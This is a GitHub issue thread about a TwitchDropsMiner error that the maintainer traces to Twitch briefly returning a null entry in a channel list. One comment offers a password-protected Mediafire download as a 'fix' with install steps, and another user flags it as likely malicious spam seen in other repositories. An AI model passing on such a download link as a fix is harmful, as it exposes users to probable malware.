### ISSUE TITLE
Error: 'NoneType' object is not subscriptable

### ISSUE THREAD

**Issue by vexxic** [DevilXD/TwitchDropsMiner#547]
![Screenshot 2024-08-26 210733](https://github.com/user-attachments/assets/98f4d8d1-d5bd-4385-800a-b261a7a3d06c)

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by guihkx** [comment]
**Do not** download and run the file above, it's most likely malicious and the person has been spamming the same comment across different repositories, e.g.:

- https://github.com/bambulab/BambuStudio/issues/4689#issuecomment-2310892145
- https://github.com/UnderscoreKilburn/repentance-issues/issues/2119#issuecomment-2310891935

**Comment by Knoxand** [comment]
@guihkx personally not debugged the code but I encountered this issue with the current streamer list for the game of SMITE. Excluding it solved for now

**Comment by DevilXD** [comment]
Hello,

I am unable to reproduce this issue with the SMITE and Overwatch 2 campaigns I have available. Which game does this happen for?

**Comment by vexxic** [comment]
I am not sure but here are my settings 
![Screenshot 2024-08-27 184656](https://github.com/user-attachments/assets/975b7a14-6cf7-404c-8faf-cb3992d2a2e2)

**Comment by DevilXD** [comment]
@vexxic Has this issue ever repeated for you after that?

**Comment by vexxic** [comment]
It happened once more after posting this, but I haven't seen it since, my only guess is that it's related to the priority only setting being unticked, iirc the error wasn't happening when it was ticked

**Comment by DevilXD** [comment]
The error suggests that, when asked about a list of live channels, Twitch has returned a list with `null` in it, like so: `[null]`.

If there would be no channels available to return, it'd instead be just an empty list: `[ ]`.

This is a Twitch bug, or more like a quirk. I don't know what I'm supposed to do with it. Twitch had a temporary hiccup, but now it's back to normal. Am I supposed to handle cases like this even?

**Comment by vexxic** [comment]
Since it hasn't been happening recently, I'd be fine with closing this topic, thanks for your work
